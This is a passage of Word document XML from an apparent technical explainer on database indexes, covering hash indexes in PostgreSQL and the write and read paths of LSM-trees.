      <w:r w:rsidRPr="00A12791">
        <w:t>Index size reduction: 60-90% for highly repetitive indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10EEFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="5C10779D">
          <v:rect id="_x0000_i5423" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ADA87F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Hash Indexes — O(1) Point Lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25CD47" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash Table Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6140FF06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A hash index stores hash(key) → row_pointer mappings. Lookup is O(1) average — hash the search key, find the bucket, scan entries in the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584680B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Internal structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13981FD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E09B379" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Hash table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65371048" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Buckets array: B buckets (B typically a power of 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C788682" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Bucket: linked list or open-addressing array of (key, row_ptr) pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CCCF5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C0E14" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Hash function: h(key) → [0, B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF519A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  bucket_index = h(key) &amp; (B-1)  // fast modulo for power-of-2 B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E6671A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E09EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F3C0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  bucket = buckets[h(key) &amp; (B-1)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFF46D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  linear scan through bucket for matching key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0BF6F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CC3E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Average case: O(1) — assuming uniform hash distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93CF02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Worst case: O(N) — all keys hash to same bucket (pathological)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577936CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Collision resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60381D5A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Chaining:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Each bucket is a linked list. Collisions append to the list. Simple but memory-inefficient (pointer overhead per entry) and cache-unfriendly (pointer chasing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAFF74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Linear probing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> On collision, try bucket+1, bucket+2, ... until empty slot found. Cache-friendly (sequential memory access). Degrades with high load factor (many probes required when table is nearly full).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6E558" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cuckoo hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Two hash functions, two tables. Each key has exactly two possible positions. On collision, displace the existing key to its alternative position (possibly cascading). Worst-case O(1) lookup (always check exactly two positions). Used in high-performance network packet classification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8969DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash Indexes in Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF17BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL hash indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2E2FAF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>PostgreSQL's hash index uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linear hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — the number of buckets grows incrementally as the index fills, avoiding expensive full rehash operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE822D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C8863" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Linear hashing expansion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A591D59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Start: 2 buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7C1F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  When any bucket exceeds fill threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567EF87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Split one bucket (determined by a split pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5CD1A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Rehash only the entries in the split bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2E12F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → O(entries_in_split_bucket) work, not O(all_entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E59DCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE346CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Over time, all buckets are split and the table doubles in size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FAF9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Gradual, incremental growth rather than sudden full rehash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0FA06" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL hash indexes (pre-10)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> were not WAL-logged — crash recovery was unsupported. PostgreSQL 10+ made hash indexes fully WAL-logged and crash-safe. They are now a viable production option for large equality-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA45F72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When hash indexes outperform B-Trees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE52C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EAAF99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree equality lookup: 3-4 page reads (traverse from root to leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305F84D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Hash index equality lookup: 1-2 page reads (compute hash, read bucket page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77A9C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="18B945A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For equality-only workloads with large tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B21C5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Hash index: 50% fewer I/Os per lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F70FEC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Hash index: smaller (no internal node pages, compact structure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262ABF68" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDB71F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Limitation: hash indexes support ONLY equality (=)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066FEE6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No range queries (WHERE x &gt; 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D80D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No prefix queries (WHERE name LIKE 'Alice%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A54964B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  No ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A167B28" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No BETWEEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FAB68" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="7EC9A829">
          <v:rect id="_x0000_i5424" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFBAFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. LSM-Tree Indexes — The Write-Optimized Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114EEF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Problem With B-Trees for Write-Heavy Workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1FA9EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree writes are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>random I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — modifying a leaf node requires reading its page, modifying it in memory, and writing it back. The target page is determined by the key value — it can be anywhere on disk. At high write rates (millions of inserts/second), random I/O dominates. NVMe SSDs handle random I/O well but still perform significantly worse than sequential I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6FE82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write amplification in B-Trees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E878B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F42DE8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Single row insert into a B-Tree index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336019BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read target leaf page (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C85E0D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Modify in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CCCBE7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write modified leaf page (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B712B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write WAL record (sequential I/O — appended to log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55E05A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Possibly write parent pages if split occurred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8CCFC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C2BDC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write amplification: 2-10× (depending on split frequency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB6897" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>I/O pattern: random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E8689B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The LSM-Tree Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301F6F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log-Structured Merge-Tree (LSM-Tree)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>, used by RocksDB, LevelDB, Cassandra, HBase, and many modern databases, converts random writes into sequential writes by buffering mutations and periodically merging sorted files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C812E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core data flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A48991" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E60EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311981D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  1. Append to WAL (sequential write — durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A963CB1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Write to MemTable (in-memory sorted structure, typically a skip list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A31F41" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Return success to caller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF2C8FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915A3F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  When MemTable reaches size threshold (e.g., 64MB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F5581" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Flush MemTable to disk as an immutable SSTable file (sequential write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0007D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    New MemTable starts accepting writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFB851" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAECD78" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D70D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Check MemTable (most recent writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE2EC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Check Level 0 SSTables (recent flushes, may overlap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45B095" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Check Level 1, 2, 3... SSTables (older, progressively larger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B941C9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Return first matching entry found (highest sequence number = most recent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1AC717" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54BA90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Compaction (background):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85EDDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Merge SSTables from Level N into Level N+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20034966" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
